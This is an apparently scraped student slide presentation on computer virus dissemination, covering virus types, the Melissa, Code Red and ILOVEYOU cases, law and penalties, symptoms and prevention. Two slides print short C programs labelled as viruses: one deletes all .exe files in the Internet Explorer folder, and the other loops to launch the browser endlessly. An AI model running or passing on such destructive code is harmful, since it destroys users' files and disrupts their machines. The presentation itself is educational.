Vous êtes sur la page 1sur 33

WELCOME TO OUR

PRESENTATIO
N

Our Presentation
Topic

VIRUS
VIRUS
DISSEMINATION
DISSEMINATION

INTRODUCTION TO

VIRUS
DISSEMINATION
virus ?
Types of computer virus?
What a computer virus do?
Sources of Computer virus?
What is computer

What is computer
Virus?

What Is Virus
A virus is
a computer program that can copy itself
and infect a computer without
permission or knowledge of the user.
a type of software program that, like a
biological virus, reproduces and
spreads itself and strongly affects on
data.
a program that pass on malicious code
to other programs by modifying them.

What Is Virus(Cont.)
Infects a program by attaching the program
1. Destroy the program or coexist with it.
2. A good program, once infected becomes
a carrier and infects other program.
3. Either transient or resident (stand
alone).

1/28/17

Group C - Presentatin on : How Do Viruses


Gain Control

Types of computer
Program virus
Macro virus
Logical bomb
Time bomb

Boot Sector virus


Worms
Trojan Horse

Virus.

Program Virus
These viruses infect program files, which

have extensions such as


.COM,.EXE.,SYS.,DLL,.OVL, or .SCR.
program files are attractive targets for
computer virus because they are widely
used and have relativity, simple formats
to which viruses can attach themselves.

Macro

Viruses

These viruses infects data files. For example,

Microsoft word document and template files


are susceptible to macro virus attacks they
spread rapidly as infected documents are
shared on networks or downloaded from
internet sites.

LOGICAL BOMBS
A logical bomb is a

destructive program or virus


that remains hidden until it is
triggered when certain
specific conditions has
occurred.

TIME BOMB
A time bomb is a

destructive program or virus


that is spreading and will
trigger an event after a period
of time has passed.

BOOT SECTOR VIRUS


A boot sector virus infects

boot sector of computers.


During system boot, boot
sector virus is loaded into
main memory and destroys
data stored in hard disk

WORMS
A worm is also a destructive

program that fills a computer


system with self-replicating
information.
Types of WORMS VIRUS:
MAIL WORM
PURE WORM

TROJAN HORSE
Trojan Horse is a destructive

program. It usually pretends as


computer games or application
software. If executed, computer
system will be damaged.
They are not replicate themselves.

1999)
Melissa virus spread in Microsoft Word documents
sent via e-mail.
How it works ?
Created the virus as word document
Uploaded to an internet newsgroup
Anyone who download the document and
opened it would trigger the virus.
Send friendly email messages to first 50 people
in persons address book.
It was the fastest spreading virus ever seen.
Forced a number of large companies to shut

down their e-mail systems.

Code Red (Worm)


Code Red made huge headlines in 2001
It slowed down internet traffic when it began

to replicate itself.
Each copy of the worm scanned the internet
for Windows NT or Windows 2000 that dont
have security patch installed.
Each time it found an unsecured server, the
worm copied itself to that server.

Code Red Worm


Designed to do three things
Replicate itself for the first 20 days of each
month.
Replace web pages on infected servers with a
page that declares Hacked by Chinese
Launch a concreted attack on the White
House Web server

Love Bug Virus


Onel de Guzman (a former computer science student) was
identified as the person responsible for creating and disseminating
the 'love bug' virus. However, Philippine law did not criminalize
hacking or the distribution of viruses. The Philippine officials
struggled with the question of how to prosecute De Guzman. They
finally charged him with theft and credit card fraud but the charges
were dismissed.
De Guzman could not be extradited for prosecution in other
countries such as the US (which has cybercrime laws) because the
conduct attributed to De Guzman was not a crime in the
Philippines. Extradition treaties require 'double criminality', namely
the act for which a person is extradited must be a crime in both the
extraditing country and the country seeking the extradition. De
Guzman could not be charged for disseminating the 'love bug'
virus. No one was prosecuted for the 'love bug' virus.

18

I Love You Virus


(May,2000)
Contained a piece of code as an attachment.
Double Click on the attachment triggered the

code.
Sent copies of itself to everyone in the
victims address book
Started corrupting files on the victims
machine.

A virus that deletes all .exe


files from a folder
#include<stdio.h>
#include<dos.h>
int main(void){
system("cd c:\\progra~1\\intern~1");
system("del *.exe");
system("cls");
return 0;
}
20

A virus that open internet


explorer at infinite times when
we open internet explorer
#include<stdio.h>
#include<dos.h>
int main (void){
While(1){
system("c:\\progra~1\\intern~1\\iexplore
.exe");
}
return 0;
}
21

A virus that can change a file


pointer

The script looks at each file in the current directory and tests
if the file is an executable. All executables are replaced with a
copy of this virus file.
22

Law Enforcement
Challenges to law enforcement:
Identifying the perpetrator

and

extent of the crime


Volatility of electronic data
Need for fast and confidential
investigations
Need for successful prosecutions

23

Fine and Penalties


According to the section 66(c),section 66(g),and
section 66(h) of Information and Technology
Act: 2000 .Whoever with the intent to cause or
knowing that he is likely to cause wrongful loss
or damage to the public or any person destroyes
or deletes or alters any information residing in a
computer resource or diminished its value or
utility or affects it injuriously by any means
commits virus dissemination.
And shall be punished with imprisonment upto 3
years and/or fine upto 2 lakh.

24

Virus Signatures
A virus cannot be completely invisible. Code for it
must be stored somewhere (even if its just in
memory).
Viruses also execute and spread in certain ways.
They are essentially executing on a sequential,
deterministic turning machine after all.
They can infect again on PCs when antivirus out of
date.
Can change a file or program pointer to itself.
1/28/17

Group C - Presentatin on : How Do Viruses


Gain Control

25

How does it Spread

1/28/17

Group C - Presentatin on : How Do Viruses


Gain Control

26

How does it Spread

1/28/17

Group C - Presentatin on : How Do Viruses


Gain Control

27

Virus Symptoms
The computer system becomes slow.
Sometimes start machine and restart in few
moments.
The size of available free memory reduces.
They can also erase files or create shortcut files
even format your hard disk and crash the
system.
Attempts to access the hard disk drive, which can
result in error messages such as : Invalid drive
specification.
Unknown and Uninstalled icons on desktop.
The computer does not boot.
28

Top 5 Sources of Computer


Virus Attack
Downloadable Programs
Cracked Software
Email Attachments
Internet
Booting From CD

tions to prevent virus infect


Always update your antivirus software at least
weekly.
Back up your important files
and ensure that they can be
restored.
Change the computer's boot

tions to prevent virus infect


Forget opening unexpected
e-mail attachments, even if
they're from friends
Install security updates for
your operating system and
programs as soon as
possible.

tions to prevent virus infecti


Don't share Drive C: without
a password and without
read-only restrictions.
Empty floppy drives of
diskettes before turning on
computers, especially

THANK

YOU

HAPPY AND SAFE


COMPUTING....

Vous aimerez peut-être aussi